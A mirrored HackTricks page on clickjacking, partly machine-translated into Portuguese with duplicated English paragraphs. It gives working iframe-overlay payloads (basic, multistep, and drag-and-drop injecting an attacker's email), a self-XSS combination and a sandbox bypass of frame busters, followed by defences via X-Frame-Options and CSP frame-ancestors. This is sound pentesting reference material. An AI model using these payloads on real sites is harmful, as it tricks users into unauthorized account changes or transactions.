Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-21 10:33:36 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/clickjacking.md

16 KiB
Raw Blame History

Clickjacking

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥


Use Trickest para construir e automatizar fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Acesse hoje:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

O que é Clickjacking

Clickjacking é um ataque que enganar um usuário a clicar em um elemento de uma página da web que é invisível ou disfarçado como outro elemento. Isso pode fazer com que os usuários baixem malware sem saber, acessem páginas da web maliciosas, forneçam credenciais ou informações sensíveis, transfiram dinheiro ou comprem produtos online. (De aqui).

Truque de preencher formulários

Às vezes é possível preencher o valor dos campos de um formulário usando parâmetros GET ao carregar uma página. Um atacante pode abusar desse comportamento para preencher um formulário com dados arbitrários e enviar a carga de clickjacking para que o usuário pressione o botão Enviar.

Preencher formulário com Arrastar e Soltar

Se você precisa que o usuário preencha um formulário, mas não quer pedir diretamente a ele para escrever algumas informações específicas (como o e-mail e/ou senha específica que você conhece), você pode simplesmente pedir a ele para Arrastar e Soltar algo que escreverá seus dados controlados, como neste exemplo.

Payload básico

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Carga Única em Vários Passos

Clickjacking attacks can be made more effective by using a multistep payload. In a multistep payload, the attacker divides the malicious action into multiple steps, each triggered by a separate click event. This technique can help bypass certain security measures that may be in place to detect and prevent clickjacking attacks.

To implement a multistep payload, the attacker first identifies the target action they want to perform on the victim's behalf. This could be anything from posting a message on a social media platform to making a financial transaction.

Next, the attacker creates a series of hidden iframes or buttons on their malicious website. Each iframe or button corresponds to a step in the multistep payload. When the victim clicks on the visible content of the attacker's website, they unknowingly trigger the hidden iframes or buttons, which perform the desired action on their behalf.

By dividing the malicious action into multiple steps, the attacker can make it more difficult for security measures to detect the clickjacking attack. Each step may appear harmless on its own, but when combined, they can lead to a potentially harmful action being performed without the victim's knowledge or consent.

It is important for developers and security professionals to be aware of the multistep payload technique and take appropriate measures to protect against clickjacking attacks. This can include implementing frame-busting techniques, using X-Frame-Options headers, and regularly testing web applications for vulnerabilities.

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Carga de Arrastar e Soltar + Clique

Clickjacking can be combined with other techniques to create more sophisticated attacks. One such combination is the Drag & Drop + Click payload. This technique takes advantage of the user's interaction with draggable elements on a webpage.

Clickjacking pode ser combinado com outras técnicas para criar ataques mais sofisticados. Uma dessas combinações é a carga de Arrastar e Soltar + Clique. Essa técnica aproveita a interação do usuário com elementos arrastáveis em uma página da web.

The attacker first creates a malicious webpage that contains a draggable element, such as an image or a button. When the user visits this webpage, they may be enticed to interact with the draggable element.

O atacante primeiro cria uma página da web maliciosa que contém um elemento arrastável, como uma imagem ou um botão. Quando o usuário visita essa página da web, ele pode ser incentivado a interagir com o elemento arrastável.

Once the user starts dragging the element, the attacker's webpage uses JavaScript to overlay an invisible iframe on top of a target webpage. The iframe is positioned in such a way that when the user releases the draggable element, they inadvertently click on a hidden button or perform an action on the target webpage without their knowledge.

Assim que o usuário começa a arrastar o elemento, a página da web do atacante usa JavaScript para sobrepor um iframe invisível em cima de uma página da web alvo. O iframe é posicionado de tal forma que, quando o usuário solta o elemento arrastável, ele inadvertidamente clica em um botão oculto ou realiza uma ação na página da web alvo sem o seu conhecimento.

This technique can be used to perform various malicious actions, such as submitting forms, making unauthorized transactions, or even changing the user's account settings.

Essa técnica pode ser usada para realizar várias ações maliciosas, como enviar formulários, fazer transações não autorizadas ou até mesmo alterar as configurações da conta do usuário.

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Se você identificou um ataque XSS que requer que o usuário clique em algum elemento para acionar o XSS e a página é vulnerável a clickjacking, você pode abusar disso para enganar o usuário a clicar no botão/link.
Exemplo:
Você encontrou um self XSS em alguns detalhes privados da conta (detalhes que apenas você pode definir e ler). A página com o formulário para definir esses detalhes é vulnerável a Clickjacking e você pode preencher o formulário com os parâmetros GET.
__Um atacante poderia preparar um ataque de Clickjacking para aquela página, preenchendo o formulário com o payload XSS e enganando o usuário a enviar o formulário. Assim, quando o formulário for enviado e os valores forem modificados, o usuário executará o XSS.

Como evitar o Clickjacking

Defesas do lado do cliente

É possível executar scripts no lado do cliente que realizam alguns ou todos os seguintes comportamentos para evitar o Clickjacking:

  • verificar e garantir que a janela de aplicativo atual seja a janela principal ou superior,
  • tornar todos os frames visíveis,
  • impedir o clique em frames invisíveis,
  • interceptar e sinalizar possíveis ataques de clickjacking para um usuário.

Bypass

Como os frame busters são JavaScript, as configurações de segurança do navegador podem impedir sua operação ou até mesmo o navegador pode não suportar JavaScript. Uma forma eficaz de contornar os frame busters é usar o atributo sandbox do HTML5 iframe. Quando isso é definido com os valores allow-forms ou allow-scripts e o valor allow-top-navigation é omitido, o script do frame buster pode ser neutralizado, pois o iframe não pode verificar se é ou não a janela superior:

<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms allow-scripts"></iframe>

Tanto os valores allow-forms quanto allow-scripts permitem as ações especificadas dentro do iframe, mas a navegação de nível superior é desativada. Isso inibe comportamentos de quebra de frame, permitindo ao mesmo tempo a funcionalidade dentro do site-alvo.

Dependendo do tipo de ataque de Clickjacking realizado, você também pode precisar permitir: allow-same-origin e allow-modals ou até mais. Ao preparar o ataque, verifique o console do navegador, pois ele pode informar quais outros comportamentos você precisa permitir.

X-Frame-Options

O cabeçalho de resposta HTTP X-Frame-Options pode ser usado para indicar se um navegador deve ou não permitir a renderização de uma página em um <frame> ou <iframe>. Os sites podem usar isso para evitar ataques de Clickjacking, garantindo que seu conteúdo não seja incorporado em outros sites. Defina o cabeçalho X-Frame-Options para todas as respostas que contêm conteúdo HTML. Os valores possíveis são:

  • X-Frame-Options: deny, que impede que qualquer domínio incorpore o conteúdo (valor recomendado)
  • X-Frame-Options: sameorigin, que permite apenas que o site atual incorpore o conteúdo.
  • X-Frame-Options: allow-from https://trusted.com, que permite que o 'uri' especificado incorpore esta página.
  • Verifique as limitações abaixo, pois isso falhará se o navegador não o suportar.
  • Outros navegadores suportam a nova diretiva CSP frame-ancestors. Alguns suportam ambos.

Diretiva frame-ancestors da Política de Segurança de Conteúdo (CSP)

A proteção recomendada contra Clickjacking é incorporar a diretiva frame-ancestors na Política de Segurança de Conteúdo da aplicação.
A diretiva frame-ancestors 'none' é semelhante ao comportamento da diretiva X-Frame-Options deny (Ninguém pode incorporar a página).
A diretiva frame-ancestors 'self' é amplamente equivalente à diretiva X-Frame-Options sameorigin (apenas o site atual pode incorporá-lo).
A diretiva frame-ancestors trusted.com é amplamente equivalente à diretiva X-Frame-Options allow-from (apenas o site confiável pode incorporá-lo).

A seguinte CSP permite apenas frames do mesmo domínio:

Content-Security-Policy: frame-ancestors 'self';

Consulte a documentação a seguir para obter mais detalhes e exemplos mais complexos:

Limitações

  • Compatibilidade com navegadores: O CSP frame-ancestors ainda não é suportado por todos os principais navegadores.
  • X-Frame-Options tem prioridade: A seção "Relação com X-Frame-Options" da especificação CSP diz: "Se um recurso for entregue com uma política que inclua uma diretiva chamada frame-ancestors e cuja disposição seja "enforce", o cabeçalho X-Frame-Options DEVE ser ignorado", mas o Chrome 40 e o Firefox 35 ignoram a diretiva frame-ancestors e seguem o cabeçalho X-Frame-Options.

Referências


Use Trickest para criar e automatizar fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Acesse hoje mesmo:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥